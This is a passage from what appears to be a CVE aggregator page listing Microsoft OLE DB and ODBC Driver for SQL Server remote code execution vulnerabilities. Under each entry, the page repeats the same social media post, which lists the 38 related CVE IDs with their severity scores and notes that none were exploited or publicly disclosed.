  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28941
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28940
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29045
(7.5 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28935
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
